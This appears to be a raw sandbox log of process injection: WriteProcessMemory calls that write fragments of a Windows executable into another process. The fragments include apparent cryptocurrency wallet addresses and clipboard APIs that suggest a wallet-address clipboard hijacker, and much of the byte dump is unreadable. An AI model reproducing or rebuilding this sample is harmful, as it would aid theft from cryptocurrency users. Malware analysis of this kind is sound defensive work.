buffer:MZ ÿÿ ¸ @ À º ´ Í!¸LÍ!This program cannot be run in DOS mode.
$ ÁÓw¯ÏÓw¯ÏÓw¯Ï®ÎÖw¯ÏÓw®ÏÙw¯ÏJ¦ÎÖw¯ÏJÎÒw¯ÏRichÓw¯Ï PE L ¡Æî` à I @ P @ Ø) ( @ ì ì( 8 .text á `.rdata l
@ @.data L 0 @ À.reloc ì @ @ B base_address:0x00400000 process_identifier:2748 process_handle:0x00000210
1
1
0
WriteProcessMemory
buffer:* (* :* H* P* G 2 A / C L P / 0 5 / R Y S 1 K C U 1 u p y T n L H b V X C w 4 C u Q v k x F w w M U 6 e b 2 4 3 D B p x V Q 1 k d Y o J b W w u x 2 B f z 5 4 B f M B 5 Z 2 C Q 4 b c 1 q q 3 e 0 9 l t q v u z g 9 0 3 d x s 7 q h h a j k e l 9 5 r z w u 4 f 2 y 2 L a M w 5 c t k 9 5 6 V 3 h r t q f c o 6 E z Y z W i o a G t Q R r M P e Y R p x Q T a W p x t 6 R u X w q t f 3 T 3 F z W F B f b P 2 l t c 1 q w j d 7 9 y 7 p k 3 4 q u n y k 8 z p z 3 d l l e k d 7 x 5 4 p v e m h a a 0 x 1 c 7 5 A 4 A b e 3 9 e 8 F 2 9 8 4 a 1 c 6 6 A 8 9 8 B F 7 E 0 b 5 c 3 E 7 E 1 0 0 0 0 0 L 0 0 0 0 T 0 0 M O N 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 L a M w 5 c t k 9 5 6 V 3 h r t q f c o 6 E z Y z W i o a G t Q R r 0 0 0 0 0 0 0 0 0 0 0 0 0 0 W 0 0 0 0 0 0 0 8 4 g R 9 n 7 j y Y w Q j W 3 c c M X u B 1 M p Q a N M J 3 A s K U z x D T a K 9 e W r 2 h c h 4 Z q F 1 8 a A f C x V W Q i F 8 G 8 N S L 3 3 x k s E L 9 8 W F h L g X P L j Q N F p w D s D 7 G 1 q Q Z Y t F g 4 t J x t G R p Z T M P 5 i d 2 z d 8 s f e C a d d r 1 q 9 x x n 6 5 2 n 0 w h 0 p k 3 h 6 g u e c v h 6 p x r k g p 0 6 r l m 8 0 t v s x p q k z q h 0 z x r 9 y h q k a a w f 3 4 l 8 k 8 w 0 c d a c 0 k 6 c l j g g t 9 j t f t w m z 3 q 8 8 2 6 j 9 A e 2 t d P w U P E Z D q N h A C J 3 Z T 5 N d V j k N f f G A w a 4 M c 9 N 9 5 u d K W Y z t 1 V n F n g L M n P E Z 1 K C U 1 u p y T n L H b V X C w 4 C u Q v k x F w w M U 6 e b 2 4 t 1 Y y T 2 6 x v 4 Z A H W T x q q H U o W c W 9 N h Z 7 S Q o Y M j b n b 1 g 9 w j g x z z g k s q m y f s n p p e q g r 8 y j 6 6 z w j 8 l d 9 0 m j k e r n e l 3 2 . d l l LoadLibraryW S h l w a p i . d l l n t d l l . d l l S h e l l 3 2 . d l l O l e 3 2 . d l l U s e r 3 2 . d l l GetProcAddress GetModuleFileNameW CreateDirectoryW GlobalAlloc GlobalFree GlobalLock GlobalUnlock LocalAlloc LocalFree lstrlenW StrChrW StrStrW StrStrIW StrToIntExW PathIsDirectoryW CoInitialize HeapFree CreateMutexA CreateMutexW GetLastError SHGetFolderPathA PathAppendW StringCbPrintfW memset wmemset memcpy OpenClipboard GetClipboardData EmptyClipboard SetClipboardData CloseClipboard @ #@ `"@ ($@ &@ ¸%@ °!@ h!@ à#@ 8 @ È @ @ p%@ ø$@ "@ !@ ¡Æî`
´ $) $ ¡Æî` GCTL á .text$mn .idata$5 .rdata $) ´ .rdata$zzzdbg Ø) .idata$2 ì) .idata$3 * .idata$4 * T .idata$6 0 L .bss * ^* * (* :* H* P* ÄLoadLibraryW ®GetProcAddress ^ExitProcess }Sleep 4GlobalFree KERNEL32.dll base_address:0x00402000 process_identifier:2748 process_handle:0x00000210